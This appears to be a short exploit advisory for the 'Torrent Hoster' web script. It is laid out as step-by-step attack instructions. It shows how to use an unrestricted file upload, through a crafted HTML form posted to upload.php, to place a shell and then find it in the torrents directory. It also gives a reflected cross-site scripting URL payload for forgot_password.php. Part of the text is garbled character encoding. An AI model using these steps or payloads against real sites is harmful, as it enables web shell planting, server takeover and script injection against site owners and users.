39 lines
No EOL
2 KiB
Text
39 lines
No EOL
2 KiB
Text
========================================================================================
|
|
| # Title : Torrent Hoster Remont Upload Exploit
|
|
| # Author : El-Kahina
|
|
| # Home : www.h4kz.com |
|
|
| # Script : Powered by Torrent Hoster.
|
|
| # Tested on: windows SP2 Fran�ais V.(Pnx2 2.0) + Lunix Fran�ais v.(9.4 Ubuntu)
|
|
| # Bug : Upload
|
|
|
|
|
====================== Exploit By El-Kahina =================================
|
|
# Exploit :
|
|
|
|
1 - use tamper data :
|
|
|
|
http://127.0.0.1/torrenthoster//torrents.php?mode=upload
|
|
|
|
2-
|
|
<center>
|
|
Powered by Torrent Hoster
|
|
<br />
|
|
<form enctype="multipart/form-data" action="http://127.0.0.1/torrenthoster/upload.php" id="form" method="post" onsubmit="a=document.getElementById('form').style;a.display='none';b=document.getElementById('part2').style;b.display='inline';" style="display: inline;">
|
|
<strong>���� ��� ����� �� ��:</strong> <?php echo $maxfilesize; ?>��������<br />
|
|
<br>
|
|
<input type="file" name="upfile" size="50" /><br />
|
|
<input type="submit" value="��� �����" id="upload" />
|
|
</form>
|
|
<div id="part2" style="display: none;">��� ��� ����� .. �� ���� �����</div>
|
|
</center>
|
|
|
|
3 - http://127.0.0.1/torrenthoster/torrents/ (to find shell)
|
|
|
|
4 - Xss:
|
|
|
|
http://127.0.0.1/torrenthoster/users/forgot_password.php/>"><ScRiPt>alert(00213771818860)</ScRiPt>
|
|
|
|
==========================================
|
|
Greetz : Exploit-db Team
|
|
all my friend :(Dz-Ghost Team )
|
|
im indoushka's sister
|
|
------------------------------------------ |